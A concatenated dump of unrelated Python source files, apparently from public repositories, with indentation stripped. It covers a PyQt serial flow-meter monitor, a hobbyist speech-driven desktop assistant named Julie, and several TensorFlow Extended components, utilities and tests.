self.cmdlist.append(_CMD_12)
self.cmdlist.append(_CMD_13)
self.cmdlist.append(_CMD_14)
self.cmdlist.append(_CMD_15)
self.cmdlist.append(_CMD_16)
self.cmdlist.append(_CMD_17)
self.cmdlist.append(_CMD_18)
self.cmdlist.append(_CMD_19)
#List only usb-ttl ports in self.portListBox QListWidget
self.ports = list(port_list.comports())
for p in self.ports:
#if "usb" in p[1]:
self.portListBox.addItem(p[0])
self.btn1.setEnabled(False)
self.btn2.setEnabled(True)
#self.lst.selectedItems()
# getting item changed signal
self.portListBox.currentItemChanged.connect(self.portLstItemChanged)
self.db = CRUD("flow.db")
self.db.openDBHard()
self.dtv = DataView()
# renderer = QtSvg.QSvgRenderer('ico1.svg')
# painter = QPainter(self.btn1)
# painter.restore()
# renderer.render(painter)
# self.btn1.show()
def portLstItemChanged(self, tm):
print("Port Item Changed " + tm.text())
self.selectedPort = tm.text()
if tm.text() != "":
#if "USB" in tm.text():
self.btn1.setEnabled(True)
def startSensorThread(self):
if self.sensorPortOpen:
if not self.sensorThreadCreated:
self.sensor = PrimaryThread(self.serialSensor, self.cmdlist)
self.sensorThread = QThread()
self.sensorThread.started.connect(self.sensor.run)
self.sensor.signal.connect(self.sensorData)
self.sensor.moveToThread(self.sensorThread)
self.sensorThread.start()
self.sensorThreadCreated = True
print("Starting Sensor Thread")
def extractFlowData(self, starData=""):
parts = starData.split(" ")
res = "0000.00"
if(len(parts) >= 18):
#val = int('0x' + parts[15]+parts[16]+parts[17]+parts[18], base=16)
val = int(parts[12]+parts[13], base=16)
if val > 0:
res = str(val/1000)
else:
res = 0
return res
def extractSumData(self, starData=""):
parts = starData.split(" ")
res = "0000.00"
if(len(parts) >= 18):
val = int(parts[12]+parts[13], base=16)
if val > 0:
res = str(val/1000)
else:
res = 0
return res
def extractPercentData(self, starData=""):
parts = starData.split(" ")
res = "0000.00"
if (len(parts) >= 18):
#val = int(parts[12] + parts[13] + parts[14] + parts[15], base=16)
val = int(parts[12] + parts[13], base=16)
if val > 0:
res = str(val/1000)
else:
res = 0
return res
#Data Received from thread. parts[12] is dev id. Not Applicable now.
#12-13-2021 23:40:37 - [8, 4, 0, 0, 0, 2, 113, 82] - 08 04 04 00 1A 00 00 43 43 . Terminal data is shown as below
#08 04 00 00 00 02 71 52 - 08 04 04 00 A1 00 00 43 43
# return data: dev id - F.code - Bytes Count - B3 B2 B1 B0 - CRC - CRC
# 08 04 04 00 1A 00 00 - 43 - 43
def sendMeterDataFromSensorString(self, sensorString:str):
parts = sensorString.split(" ")
devid = 0
if(len(parts) >= 18):
#print(parts[0] + " " +parts[9] + " " +parts[10] + " " +parts[11] + " " + parts[12])
if(int(parts[9], base=16) == 8):
devid = 8
if(int(parts[3], base=16) == 0):
self.mimic.meterFlow1 = self.extractFlowData(sensorString)
self.mimic.AppendFlow1(float(self.extractFlowData(sensorString)))
if(int(parts[3], base=16) == 34):
self.mimic.meterSum1 = self.extractSumData(sensorString)
if (int(parts[3], base=16) == 4):
#self.mimic.meterSum1 = self.extractSumData(sensorString)
print("PERCENT 1: " + sensorString)
if (int(parts[9], base=16) == 9):
devid = 9
if (int(parts[3], base=16) == 0):
self.mimic.meterFlow2 = self.extractFlowData(sensorString)
if (int(parts[3], base=16) == 34):
self.mimic.meterSum2 = self.extractSumData(sensorString)
if (int(parts[3], base=16) == 4):
# self.mimic.meterSum1 = self.extractSumData(sensorString)
print("PERCENT 2: " + sensorString)
if (int(parts[9], base=16) == 10):
devid = 10
if (int(parts[3], base=16) == 0):
self.mimic.meterFlow3 = self.extractFlowData(sensorString)
if (int(parts[3], base=16) == 34):
self.mimic.meterSum3 = self.extractSumData(sensorString)
if (int(parts[3], base=16) == 4):
# self.mimic.meterSum1 = self.extractSumData(sensorString)
print("PERCENT 3: " + sensorString)
return devid
def sensorData(self, data_stream):
self.sensorDataString = data_stream
#strdatetime = datetime.today().strftime('%m-%d-%Y %H:%M:%S') #Collect Present Date Time
#print(strdatetime + " - " +self.sensorDataString) #
#print(self.sensorDataString)
self.msgListBox.addItem(self.sensorDataString) #Insert incomming data to local List Box
try:
self.mimic.AppendFlow1(float(self.sensorDataString))
except Exception as e:
pass
#devid = self.sendMeterDataFromSensorString(self.sensorDataString)
#self.db.insert_meter_data([strdatetime, self.sensorDataString, str(devid)]) # Inserting data to database
#self.mimic.repaint()
if(self.msgListBox.count() > 10):
self.msgListBox.clear()
@Slot()
def on_btn1_clicked(self):
if self.selectedPort != "":
if not self.sensorPortOpen:
try:
self.serialSensor = serial.Serial(self.selectedPort, baudrate=115200, timeout=2)
self.sensorPortOpen = True
except serial.SerialException as ex:
self.sensorPortOpen = False
print(ex.strerror)
print("Error Opening Serial Port..........................................")
finally:
print("Serial Port Connected..........................")
self.btn2.setEnabled(True)
# self.mim = Mimic()
# self.mim.setFixedHeight(100)
# self.VL0.addWidget(self.mim)
# self.setWindowTitle(self.window_title)
#Show svg file svgwidget
#self.svgwidget = QtSvg.QSvgWidget('ico1.svg')
#comment self.VL1 = QVBoxLayout()
#self.VL0.addWidget(self.svgwidget)
#comment self.dash.show()
@Slot()
def on_btn2_clicked(self):
#self.mimic.show()
if self.sensorPortOpen:
if not self.sensorThreadCreated:
self.startSensorThread()
self.mimic.show()
@Slot()
def on_btn3_clicked(self):
''' Example code to insert data in database
#self.db.insert_meter_data_hard()
'''
self.dtv.summery = True
self.dtv.showNormal()
@Slot()
def on_btn4_clicked(self):
self.dtv.summery = None
self.dtv.showNormal()
@Slot()
def on_btnPause_clicked(self):
if self.btnPause.text() == "Pause":
self.btnPause.setText("Start")
self.sensor.pause = True
else:
self.btnPause.setText("Pause")
self.sensor.pause = False
if __name__ == '__main__':
app = QApplication(sys.argv)
#qtmodern.styles.dark(app)
qtmodern.styles.light(app)
mw_class_instance = MainWindow()
mw = qtmodern.windows.ModernWindow(mw_class_instance)
#mw.showFullScreen()
mw.showNormal()
sys.exit(app.exec_())
```
#### File: jibonaronno/RP2040AudioRecord/paraview.py
```python
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
'''
This class will show and set parameters for a selected object. A json structure will guide
the parameter structure. Let the object name should be params.
'''
class Paraview(QWidget):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
``` |
{
"source": "JIboncb/Jibon",
"score": 3
} |
#### File: JIboncb/Jibon/main.py
```python
import speech_recognition as sr
import datetime
import wikipedia
import webbrowser
import pyttsx3
import pywhatkit
import pyjokes
import rotatescreen
import os
import PyPDF2
from textblob import TextBlob
import platform
import calendar
import cowsay
from translate import Translator
import sounddevice
from scipy.io.wavfile import write
from speedtest import Speedtest
import psutil
print('Initializing Julie')
# variables section
home = 'Panchagarh'
live_in = 'Dinajpur'
boss = 'Sir'
ai_name = 'Julie'
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[1].id)
# speak function
def speak(text):
engine.say(text)
engine.runAndWait()
# wishMe function
def wishMe():
hour = int(datetime.datetime.now().hour)
if hour>=0 and hour<12:
speak('Good morning sir')
elif hour>=12 and hour<18:
speak('Good afternoon sir')
else:
speak('Good evening sir')
speak('How can I help you')
# command taking function
def takeCommand():
r = sr.Recognizer()
with sr.Microphone() as source:
print('Listening...')
audio = r.listen(source)
try :
print('Recognizing...')
query = r.recognize_google(audio, language= 'en-in')
query = query.lower()
print(f"User said: {query}\n")
except Exception as e:
print(e)
print("Say that again please")
return query
# programme start
speak('Initializing')
speak(ai_name)
wishMe()
# if elif section
while True:
query = takeCommand()
print(query)
if 'wikipedia' in query:
speak('Searching wikipedia...')
query = query.replace('wikipedia', '')
results = wikipedia.summary(query, sentences=2)
print(results)
speak(results)
elif 'open youtube' in query.lower():
speak('Opening youtube')
url = 'youtube.com'
chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'
webbrowser.get(chrome_path).open(url)
elif 'open facebook' in query.lower():
speak('Opening facebook')
url = 'facebook.com'
chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'
webbrowser.get(chrome_path).open(url)
elif 'open google' in query.lower():
speak('Opening google')
url = 'google.com'
chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'
webbrowser.get(chrome_path).open(url)
elif 'open stackoverflow' in query.lower():
speak('Opening stackoverflow')
url = 'stackoverflow.com'
chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'
webbrowser.get(chrome_path).open(url)
elif 'joke' in query:
speak(pyjokes.get_joke())
elif 'play' in query:
song = query.replace('play', '')
speak('playing ' + song)
pywhatkit.playonyt(song)
elif 'time' in query:
time = datetime.datetime.now().strftime('%I:%M %p')
speak('Current time is ' + time)
elif 'who is' in query:
speak('Searching wikipedia...')
query = query.replace('who is', '')
results = wikipedia.summary(query, sentences=2)
print(results)
speak(results)
elif "where is" in query:
query = query.replace("where is", "")
location = query
speak("User asked to Locate")
speak(location)
chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'
webbrowser.get(chrome_path).open('https://www.google.com/maps/place/' + location)
elif 'go on a date' in query:
speak('sorry sir, I can not go with you, because i am an AI')
elif 'who are you' in query:
speak('i am an ai assistant created by Jibon')
elif 'created you' in query:
speak('i have been created by Jibon')
elif 'are you single' in query:
speak('I am finding the perfect one')
elif 'be my girlfriend' in query:
speak('Maybe you should give me some time')
elif 'how are you' in query:
speak("I am fine, Thank you")
speak("How are you, Sir")
elif 'fine' in query or "good" in query:
speak("It's good to know that your fine")
elif 'exit' in query or 'stop' in query:
speak("Thanks for giving me your time")
exit()
elif 'search' in query or 'play' in query:
query = query.replace("search", "")
query = query.replace("play", "")
webbrowser.open(query)
elif "who i am" in query:
speak("If you can talk then definitely your human.")
elif "why you came to world" in query:
speak("Thanks to Jibon. further It's a secret")
elif ai_name in query:
wishMe()
speak(f"{ai_name} 1 point o in your service Mister")
elif "can you help me" in query:
speak("of course sir, it is my pleasure")
elif "my favourite song" in query:
speak("your favourite song is mood")
elif 'hi' in query:
speak('hello sir')
elif 'rotate the screen' in query:
speak('ok sir')
screen = rotatescreen.get_primary_display()
for i in range(13):
time.sleep(1)
screen.rotate_to(i * 90 % 360)
elif 'what is your name' in query:
speak('My friends call me')
speak(ai_name)
elif 'exit' in query or 'close' in query:
speak('Thanks for giving me your time')
exit()
elif 'say whatever i write' in query:
while True:
engine = pyttsx3.init()
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[1].id)
text = input('Say something:')
engine.say(text)
engine.runAndWait()
if 'stop' in text:
exit()
elif 'exit' in text:
exit()
elif 'my songs' in query:
speak('Here you g with music')
music_dir = 'links'
songs = os.listdir(music_dir)
print(songs)
random = os.startfile(os.path.join(music_dir, songs[0]))
elif 'reason for you' in query.lower():
speak("I was created as the first big project by <NAME>")
elif 'how to hack' in query:
speak("no sir, you didn't programmed me to do these things")
elif 'good morning' in query:
speak('Good morning sir')
elif 'i love you' in query:
speak("It's hard to understand")
elif 'is love' in query:
speak('It is the 7th sence that destroy all other sence')
elif "why you came to world" in query:
speak("Thanks to Jibon. further It's a secret")
elif 'want to change your name' in query:
speak('If you want to change my name you have to go to the variable section and change the ai name.')
elif 'think about love' in query:
speak('Love is an useless thing. It will distroy your life')
elif 'where is my home' in query:
speak(f'Your home is in {home}')
elif 'i live' in query:
speak(f'You live in {live_in}')
elif 'know hacking' in query:
speak("No, I don't")
elif 'pdf reader' in query:
speak('opening pdf reader')
book = open("name.pdf", "rb")
pdfReader = PyPDF2.PdfFileReader(book)
pages = pdfReader.numPages
print(pages)
elif 'open spell checker' in query:
a = input("Input text:")
print('Your word:' + str(a))
b = TextBlob(a)
print('Corrected text:' + str(b.correct()))
elif 'system information' in query:
myS = platform.uname()
print(f'System: {myS.system}')
print(f'Node name: {myS.node}')
print(f'Release: {myS.release}')
print(f'Version: {myS.version}')
print(f'Machine: {myS.machine}')
print(f'Processor: {myS.processor}')
elif 'a pattern' in query:
def pattern(n):
for i in range(n):
print((i+1)*'*')
for i in range(n-1,0,-1):
print(i*'*')
pattern(5)
elif 'open calendar' in query:
try:
speak('tell me the number of the year')
y = int(takeCommand())
speak('Tell me the number of the month')
m = int(takeCommand())
print(calendar.month(y, m))
except Exception as e:
print(e)
speak("Sorry sir, I didn't understand")
elif 'cowsay' in query:
cowsay.daemon(input('Enter word:'))
elif 'record voice' in query:
fs = 44100
sc = int(input("Enter the duration in seconds: "))
print("Recording...\n")
recordVoice = sounddevice.rec(int(sc * fs),samplerate = fs, channels = 2)
sounddevice.wait()
write("out.wav",fs,recordVoice)
print("Finished...\nPlease check it")
elif 'check the internet speed' in query:
st = Speedtest()
speak("Checking speed....")
print("Your connection's download speed is:", st.download())
speak("Your connection's download speed is:" + str(st.download()))
print("Your connection's upload speed is:", st.upload())
speak("Your connection's upload speed is:" + str(st.upload()))
elif "check battery percentage" in query:
battery = psutil.sensors_battery()
percent = str(battery.percent)
print("Your battery is running on "+percent+"% battery level")
speak("Your battery is running on "+percent+"% battery level")
elif "open obs" in query:
os.startfile("C:\\Program Files\\obs-studio\\bin\\64bit\\obs64.exe")
elif 'open canva' in query:
os.startfile("C:\\Users\\Dinesh\\AppData\\Local\\Programs\\Canva\\Canva.exe")
else:
pass
``` |
{
"source": "JibranKalia/tfx",
"score": 2
} |
#### File: components/evaluator/executor.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import apache_beam as beam
import tensorflow as tf
import tensorflow_model_analysis as tfma
from typing import Any, Dict, List, Text
from google.protobuf import json_format
from tfx import types
from tfx.components.base import base_executor
from tfx.proto import evaluator_pb2
from tfx.types import artifact_utils
from tfx.utils import io_utils
from tfx.utils import path_utils
class Executor(base_executor.BaseExecutor):
"""Generic TFX model evaluator executor."""
def _get_slice_spec_from_feature_slicing_spec(
self, spec: evaluator_pb2.FeatureSlicingSpec
) -> List[tfma.slicer.SingleSliceSpec]:
"""Given a feature slicing spec, returns a List of SingleSliceSpecs.
Args:
spec: slice specification.
Returns:
List of corresponding SingleSliceSpecs. Always includes the overall slice,
even if it was not specified in the given spec.
"""
result = []
for single_spec in spec.specs:
columns = single_spec.column_for_slicing
result.append(tfma.slicer.SingleSliceSpec(columns=columns))
# Always include the overall slice.
if tfma.slicer.SingleSliceSpec() not in result:
result.append(tfma.slicer.SingleSliceSpec())
return result
def Do(self, input_dict: Dict[Text, List[types.Artifact]],
output_dict: Dict[Text, List[types.Artifact]],
exec_properties: Dict[Text, Any]) -> None:
"""Runs a batch job to evaluate the eval_model against the given input.
Args:
input_dict: Input dict from input key to a list of Artifacts.
- model_exports: exported model.
- examples: examples for eval the model.
output_dict: Output dict from output key to a list of Artifacts.
- output: model evaluation results.
exec_properties: A dict of execution properties.
- feature_slicing_spec: JSON string of evaluator_pb2.FeatureSlicingSpec
instance, providing the way to slice the data.
Returns:
None
"""
if 'model_exports' not in input_dict:
raise ValueError('\'model_exports\' is missing in input dict.')
if 'examples' not in input_dict:
raise ValueError('\'examples\' is missing in input dict.')
if 'output' not in output_dict:
raise ValueError('\'output\' is missing in output dict.')
self._log_startup(input_dict, output_dict, exec_properties)
# Extract input artifacts
model_exports_uri = artifact_utils.get_single_uri(
input_dict['model_exports'])
feature_slicing_spec = evaluator_pb2.FeatureSlicingSpec()
json_format.Parse(exec_properties['feature_slicing_spec'],
feature_slicing_spec)
slice_spec = self._get_slice_spec_from_feature_slicing_spec(
feature_slicing_spec)
output_uri = artifact_utils.get_single_uri(output_dict['output'])
eval_model_path = path_utils.eval_model_path(model_exports_uri)
tf.logging.info('Using {} for model eval.'.format(eval_model_path))
eval_shared_model = tfma.default_eval_shared_model(
eval_saved_model_path=eval_model_path)
tf.logging.info('Evaluating model.')
with beam.Pipeline(argv=self._get_beam_pipeline_args()) as pipeline:
# pylint: disable=expression-not-assigned
(pipeline
| 'ReadData' >> beam.io.ReadFromTFRecord(
file_pattern=io_utils.all_files_pattern(
artifact_utils.get_split_uri(input_dict['examples'], 'eval')))
|
'ExtractEvaluateAndWriteResults' >> tfma.ExtractEvaluateAndWriteResults(
eval_shared_model=eval_shared_model,
slice_spec=slice_spec,
output_path=output_uri))
tf.logging.info(
'Evaluation complete. Results written to {}.'.format(output_uri))
```
#### File: airflow_workshop/notebooks/tfx_utils.py
```python
import os
import time
import papermill as pm
import tensorflow_data_validation as tfdv
import tensorflow_model_analysis as tfma
import utils
from ml_metadata.metadata_store import metadata_store
from ml_metadata.proto import metadata_store_pb2
class TFXArtifactTypes(object):
"""Constants for different TFX artifact type names."""
EXAMPLES = 'ExamplesPath'
SCHEMA = 'SchemaPath'
EXAMPLE_STATS = 'ExampleStatisticsPath'
EXAMPLE_VALIDATION = 'ExampleValidationPath'
TRANSFORMED_EXAMPLES = 'TransformPath'
MODEL = 'ModelExportPath'
MODEL_EVAL = 'ModelEvalPath'
class TFXExecutionTypes(object):
"""Constants for different TFX execution type names."""
EXAMPLE_GEN = 'examples_gen'
STATISTICS_GEN = 'statistics_gen'
SCHEMA_GEN = 'schema_gen'
EXAMPLE_VALIDATION = 'example_validation'
TRANSFORM = 'transform'
TRAINER = 'trainer'
EVALUATOR = 'evaluator'
class TFXReadonlyMetadataStore(utils.ReadonlyMetadataStore):
"""A TFX ml-metadata store that provides read-only methods for notebooks."""
@staticmethod
def from_sqlite_db(filename_uri):
"""Returns a `TFXReadonlyMetadataStore` based off a SQLITE db uri.
Args:
filename_uri: A `str` indicating the path to the SQLITE db.
Returns:
A `TFXReadonlyMetadataStore` based off a SQLITE db uri.
"""
c = metadata_store_pb2.ConnectionConfig()
c.sqlite.filename_uri = filename_uri
return TFXReadonlyMetadataStore(metadata_store.MetadataStore(c))
def display_tfma_analysis(self, model_id, slicing_column=None):
"""Displays TFMA metrics for `model_id` sliced by `slicing_column`.
Args:
model_id: A `int` indicating the id of a `TFXArtifactTypes.MODEL` artifact
slicing_column: (Optional) A `str` indicating the slicing column for
the TFMA metrics.
Returns:
A SlicingMetricsViewer object if in Jupyter notebook; None if in Colab.
"""
tfma_artifact = self.get_dest_artifact_of_type(
model_id, TFXArtifactTypes.MODEL_EVAL)
if tfma_artifact:
return tfma.view.render_slicing_metrics(
tfma.load_eval_result(tfma_artifact.uri),
slicing_column=slicing_column)
def compare_tfma_analysis(self, model_id, other_model_id):
"""Compares TFMA metrics for `model_id` and `other_model_id`.
Args:
model_id: A `int` indicating the id of a `TFXArtifactTypes.MODEL` artifact
other_model_id: A `int` indicating the id of another
`TFXArtifactTypes.MODEL` artifact.
Returns:
A TimeSeriesViewer object if in Jupyter notebook; None if in Colab.
"""
tfma_artifact, other_tfma_artifact = (
self.get_dest_artifact_of_type(model_id, TFXArtifactTypes.MODEL_EVAL),
self.get_dest_artifact_of_type(other_model_id,
TFXArtifactTypes.MODEL_EVAL)
)
if tfma_artifact and other_tfma_artifact:
eval_results = tfma.make_eval_results(
[
tfma.load_eval_result(tfma_artifact.uri),
tfma.load_eval_result(other_tfma_artifact.uri)
], tfma.constants.MODEL_CENTRIC_MODE)
return tfma.view.render_time_series(
eval_results, tfma.slicer.slicer.SingleSliceSpec())
def display_stats_for_examples(self, examples_id):
"""Displays stats for `examples_id`.
Args:
examples_id: A `int` indicating the id of a `TFXArtifactTypes.EXAMPLES`
artifact.
"""
stats_artifact = self.get_dest_artifact_of_type(
examples_id, TFXArtifactTypes.EXAMPLE_STATS)
if stats_artifact:
tfdv.visualize_statistics(
tfdv.load_statistics(os.path.join(stats_artifact.uri,
'stats_tfrecord')))
def compare_stats_for_examples(self, examples_id, other_examples_id,
name='', other_name=''):
"""Compares stats for `examples_id` and `other_examples_id`.
Args:
examples_id: A `int` indicating the id of one `TFXArtifactTypes.EXAMPLES`
artifact.
other_examples_id: A `int` indicating the id of another
`TFXArtifactTypes.EXAMPLES` artifact.
name: (Optional) A `str` indicating the label to use for stats of
`examples_id`.
other_name: (Optional) A `str` indicating the label to use for stats of
`other_examples_id`.
"""
stats_artifact, other_stats_artifact = (
self.get_dest_artifact_of_type(
examples_id, TFXArtifactTypes.EXAMPLE_STATS),
self.get_dest_artifact_of_type(
other_examples_id, TFXArtifactTypes.EXAMPLE_STATS)
)
if stats_artifact and other_stats_artifact:
tfdv.visualize_statistics(
tfdv.load_statistics(stats_artifact.uri),
rhs_statistics=tfdv.load_statistics(other_stats_artifact.uri),
lhs_name=name, rhs_name=other_name)
def display_examples_stats_for_model(self, model_id):
"""Displays stats for examples used to train `model_id`."""
examples_artifact = self.get_source_artifact_of_type(
model_id, TFXArtifactTypes.EXAMPLES)
if examples_artifact:
self.display_stats_for_examples(examples_artifact.id)
def compare_examples_stats_for_models(self, model_id, other_model_id):
"""Compares stats for examples to train `model_id` & `other_model_id`."""
examples_artifact, other_examples_artifact = (
self.get_source_artifact_of_type(model_id, TFXArtifactTypes.EXAMPLES),
self.get_source_artifact_of_type(
other_model_id, TFXArtifactTypes.EXAMPLES)
)
if examples_artifact and other_examples_artifact:
self.compare_stats_for_examples(
examples_artifact.id, other_examples_artifact.id,
name='model_'+str(model_id), other_name='model_'+str(other_model_id))
def display_tensorboard(self, model_id, *other_model_ids):
"""Returns a Tensorboard link for `model_id` and `other_model_ids`.
Args:
model_id: A `int` indicating the id of a `TFXArtifactTypes.MODEL`
artifact.
*other_model_ids: (Optional) A list of `int` indicating the ids of other
`TFXArtifactTypes.MODEL` artifacts to also include in the Tensorboard
invocation for comparison.
"""
model_ids = [model_id] + list(other_model_ids)
model_artifacts = self.metadata_store.get_artifacts_by_id(model_ids)
model_ids_str = '-'.join([str(m) for m in model_ids])
log_file = os.path.join(
os.environ['HOME'],
'tensorboard_model_{}_log.txt'.format(model_ids_str),
)
output_notebook_path = os.path.join(
os.environ['HOME'],
'spawn_tensorboard_{}_output.ipynb'.format(model_ids_str),
)
tensorboard_logdir = ','.join([
'model_{}:{}'.format(m.id, m.uri) for m in model_artifacts
])
pm.execute_notebook(
'spawn_tensorboard.ipynb',
output_notebook_path,
parameters=dict(tb_logdir=tensorboard_logdir, tb_run_log=log_file),
progress_bar=False)
time.sleep(5) # Give it some time for log_filename to be flushed.
with open(log_file) as f:
for l in f:
if 'TensorBoard' in l:
# "TensorBoard 1.12.2 at http://... (Press CTRL+C to quit)"
return l.split(' ')[3]
```
#### File: examples/chicago_taxi/chicago_taxi_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
from tensorflow.python.lib.io import file_io # pylint: disable=g-direct-tensorflow-import
from tfx.examples.chicago_taxi import preprocess
from tfx.examples.chicago_taxi import process_tfma
from tfx.examples.chicago_taxi import tfdv_analyze_and_validate
from tfx.examples.chicago_taxi.trainer import task as trainer_task
_DATA_DIR_PATH = os.path.join(os.path.dirname(__file__), 'data')
_TRAINER_OUTPUT_DIR = 'train_output'
_TRAIN_DATA_FILE_PREFIX = 'transformed_train_data'
_EVAL_DATA_FILE_PREFIX = 'transformed_eval_data'
class TaxiTest(tf.test.TestCase):
"""Unit test for taxi util."""
def setUp(self):
super(TaxiTest, self).setUp()
self._working_dir = os.path.join(
os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()),
self._testMethodName)
file_io.recursive_create_dir(self._working_dir)
def testPipeline(self):
# TODO(b/113256925): Split this test to test preprocess and training
# separately. Possibly using tft_unit to test the result of transform_data.
stats_file = os.path.join(self._working_dir, 'train_stats')
tfdv_analyze_and_validate.compute_stats(
input_handle=os.path.join(_DATA_DIR_PATH, 'train/data.csv'),
stats_path=stats_file)
schema_file = os.path.join(self._working_dir, 'schema.pbtxt')
tfdv_analyze_and_validate.infer_schema(stats_file, schema_file)
transform_output_path = os.path.join(self._working_dir, 'transform_output')
preprocess.transform_data(
os.path.join(_DATA_DIR_PATH, 'train/data.csv'),
outfile_prefix=_TRAIN_DATA_FILE_PREFIX,
working_dir=transform_output_path,
schema_file=schema_file)
preprocess.transform_data(
input_handle=os.path.join(_DATA_DIR_PATH, 'eval/data.csv'),
outfile_prefix=_EVAL_DATA_FILE_PREFIX,
working_dir=transform_output_path,
transform_dir=transform_output_path,
schema_file=schema_file)
hparams = tf.contrib.training.HParams(
train_steps=100,
eval_steps=50,
job_dir=self._working_dir,
output_dir=os.path.join(self._working_dir, _TRAINER_OUTPUT_DIR),
tf_transform_dir=transform_output_path,
train_files=os.path.join(transform_output_path,
'{}-*'.format(_TRAIN_DATA_FILE_PREFIX)),
eval_files=os.path.join(transform_output_path,
'{}-*'.format(_EVAL_DATA_FILE_PREFIX)),
schema_file=schema_file)
# TODO(b/113256925): Test the result of run_experiment.
trainer_task.run_experiment(hparams)
# Find where Trainer wrote the eval model
eval_model_dir = os.path.join(self._working_dir, _TRAINER_OUTPUT_DIR,
trainer_task.EVAL_MODEL_DIR)
# Appends the directory name where the model was exported to (some number).
eval_model_dir = os.path.join(eval_model_dir, os.listdir(eval_model_dir)[0])
# The data under eval_model was produced by test_train.
# TODO(b/113256925): Test the result of process_tfma.
process_tfma.process_tfma(
eval_result_dir=self._working_dir,
input_csv=os.path.join(_DATA_DIR_PATH, 'eval/data.csv'),
eval_model_dir=eval_model_dir,
schema_file=schema_file)
if __name__ == '__main__':
tf.test.main()
```
#### File: tfx/orchestration/component_launcher.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
from typing import Any, Dict, List, Text, Type
from ml_metadata.proto import metadata_store_pb2
from tfx import types
from tfx.components.base import base_component
from tfx.components.base import base_driver
from tfx.components.base import base_executor
from tfx.components.base import executor_spec
from tfx.orchestration import data_types
from tfx.orchestration import metadata
from tfx.orchestration import publisher
class BaseComponentLauncher(object):
"""Responsible for launching driver, executor and publisher of component."""
# pyformat: disable
def __init__(self, component_info: data_types.ComponentInfo,
driver_class: Type[base_driver.BaseDriver],
component_executor_spec: executor_spec.ExecutorSpec,
input_dict: Dict[Text, types.Channel],
output_dict: Dict[Text, types.Channel],
exec_properties: Dict[Text, Any],
pipeline_info: data_types.PipelineInfo,
driver_args: data_types.DriverArgs,
metadata_connection_config: metadata_store_pb2.ConnectionConfig,
additional_pipeline_args: Dict[Text, Any]):
# pyformat: enable
"""Initialize a ComponentLauncher.
Args:
component_info: ComponentInfo of the component.
driver_class: The driver class to run for this component.
component_executor_spec: The executor spec to specify what to execute
when launching this component.
input_dict: Dictionary of input artifacts consumed by this component.
output_dict: Dictionary of output artifacts produced by this component.
exec_properties: Dictionary of execution properties.
pipeline_info: An instance of data_types.PipelineInfo that holds pipeline
properties.
driver_args: An instance of data_types.DriverArgs that holds component
specific driver args.
metadata_connection_config: ML metadata connection config.
additional_pipeline_args: Additional pipeline args, includes,
- beam_pipeline_args: Beam pipeline args for beam jobs within executor.
Executor will use beam DirectRunner as Default.
"""
self._pipeline_info = pipeline_info
self._component_info = component_info
self._driver_args = driver_args
self._driver_class = driver_class
self._component_executor_spec = component_executor_spec
self._input_dict = input_dict
self._output_dict = output_dict
self._exec_properties = exec_properties
self._metadata_connection_config = metadata_connection_config
self._additional_pipeline_args = additional_pipeline_args
def _run_driver(self, input_dict: Dict[Text, types.Channel],
output_dict: Dict[Text, types.Channel],
exec_properties: Dict[Text, Any]
) -> data_types.ExecutionDecision:
"""Prepare inputs, outputs and execution properties for actual execution."""
tf.logging.info('Run driver for %s', self._component_info.component_id)
with metadata.Metadata(self._metadata_connection_config) as m:
driver = self._driver_class(metadata_handler=m)
execution_decision = driver.pre_execution(
input_dict=input_dict,
output_dict=output_dict,
exec_properties=exec_properties,
driver_args=self._driver_args,
pipeline_info=self._pipeline_info,
component_info=self._component_info)
return execution_decision
# TODO(jyzhao): consider returning an execution result.
def _run_executor(self, execution_id: int,
input_dict: Dict[Text, List[types.Artifact]],
output_dict: Dict[Text, List[types.Artifact]],
exec_properties: Dict[Text, Any]) -> None:
"""Execute underlying component implementation."""
tf.logging.info('Run executor for %s', self._component_info.component_id)
executor_context = base_executor.BaseExecutor.Context(
beam_pipeline_args=self._additional_pipeline_args.get(
'beam_pipeline_args'),
tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''),
unique_id=str(execution_id))
# TODO(hongyes): move this check to a specific method which can overrided
# by subclasses.
if not isinstance(self._component_executor_spec,
executor_spec.ExecutorClassSpec):
raise TypeError(
'component_executor_spec must be an instance of ExecutorClassSpec.')
# Type hint of component will cause not-instantiable error as
# ExecutorClassSpec.executor_class is Type[BaseExecutor] which has an
# abstract function.
executor = self._component_executor_spec.executor_class(
executor_context) # type: ignore
executor.Do(input_dict, output_dict, exec_properties)
def _run_publisher(self, use_cached_results: bool, execution_id: int,
input_dict: Dict[Text, List[types.Artifact]],
output_dict: Dict[Text, List[types.Artifact]]) -> None:
"""Publish execution result to ml metadata."""
tf.logging.info('Run publisher for %s', self._component_info.component_id)
with metadata.Metadata(self._metadata_connection_config) as m:
p = publisher.Publisher(metadata_handler=m)
p.publish_execution(
execution_id=execution_id,
input_dict=input_dict,
output_dict=output_dict,
use_cached_results=use_cached_results)
def launch(self) -> int:
"""Execute the component, includes driver, executor and publisher.
Returns:
The execution id of the launch.
"""
execution_decision = self._run_driver(self._input_dict, self._output_dict,
self._exec_properties)
if not execution_decision.use_cached_results:
self._run_executor(execution_decision.execution_id,
execution_decision.input_dict,
execution_decision.output_dict,
execution_decision.exec_properties)
self._run_publisher(execution_decision.use_cached_results,
execution_decision.execution_id,
execution_decision.input_dict,
execution_decision.output_dict)
return execution_decision.execution_id
# TODO(ajaygopinathan): Combine with BaseComponentLauncher once we either:
# - have a way to serialize/deserialize components, or
# - have a clean way to use factory methods to create this class.
class ComponentLauncher(BaseComponentLauncher):
"""Responsible for launching driver, executor and publisher of component.
Convenient subclass when given a concrete component to launch.
"""
